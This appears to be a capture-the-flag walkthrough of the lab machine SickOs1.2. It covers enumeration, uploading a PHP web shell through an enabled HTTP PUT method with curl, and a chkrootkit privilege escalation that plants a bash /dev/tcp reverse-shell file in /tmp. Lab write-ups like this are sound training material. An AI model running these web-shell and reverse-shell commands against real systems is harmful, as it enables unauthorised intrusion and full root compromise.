SickOs1.2 is a machine that can be exploited to get a low privilege shell by taking advantage of the PUT method to get RCE (remote command execution). To gain root privileges there is a tool in the system called chkrootkit and by looking at its version there is a vulnerability that would allow elevation on privileges.
Scanning and Enumeration
Starting out with full TCP scan returns two open ports with one being an SSH service and the other being a web service.
Browsing to the web service displays only a picture only and nothing from the source code seems to have any useful information.
By using gobuster I attempted to further enumerate the web service for more information, here are the results:
If we browse to the /test directory we it shows an empty folder with no files in it. The source code also reveals nothing to further enumerate.
Giving that this is an empty folder we might somehow be able to place files inside of it. Going back to nmap I thought It would be a good idea to run some NSE scripts against the /test directory. After trying different NSE scripts, the http-methods script returned some interesting information about the PUT method being supported which would allow to upload a file to the /test folder.
To take advantage of the PUT method I used curl to attempt to upload a file to the /test directory. A file named hello.txt was uploaded using curl with the following command:
curl -X PUT -d @/root/hello.txt http://192.168.148.138:80/test/hello.txt
The command used above puts the contents of the file into a file called hello.txt on the web service. Using Wappalyzer (a firefox plugin to obtain information about technologies implemented on websites) I noticed that PHP was running on the server.
Since PHP runs on the web server I uploaded a one liner PHP web shell to get command execution, this was also accomplished by using the curl command.
curl -X PUT -d '<?php echo system($_GET["cmd"]); ?>' http://192.168.148.138:80/test/shell.php
By browsing to the file we can now execute commands by adding “?cmd=<command>” at the end of the url.
To get a reverse shell a hosted a PHP reverse shell from Pentestmonkey using SimpleHTTPServer on port 443 as port 80 was most likely being blocked by some kind of filtering. The command I used to download the PHP reverse shell to the target machine was the following:
After setting up my netcat listener on port 443 I browsed to the PHP reverse shell and was able to successfully get a reverse shell as www-data.
For privilege escalation I uploaded LinEnum.sh to the target machine and then executed it. After looking at the information from the output I was able to spot chkrootkit inside the /etc/cron.daily folder. I knew from a previous box that it was vulnerable but I still wasn’t sure if that would apply to the one on the machine since the version might have been different.
To figure out the version of chkrootkit I simply used the head command as follows:
Looking for a privilege escalation POC for that specific version I was able to come across the following url https://www.exploit-db.com/exploits/33899. The vulnerability consists of placing a file named “update” inside the /tmp folder which will be in turn executed by Chkrootkit. Because I was only able to work with port 443 to get a reverse shell my plan was to create the file and then close my netcat session to start listening again on port 443 for a root shell.
I first created the file using the echo command and a reverse shell as follows:
echo "bash -c 'sh -i >& /dev/tcp/192.168.148.133/443 0>&1'" > update
I then assigned execution permissions to the update file using “chmod +x update”. Once everything was set, I exit out my netcat session and start listening again on port 443 and after a few minutes I was able to successfully received a shell as the root user.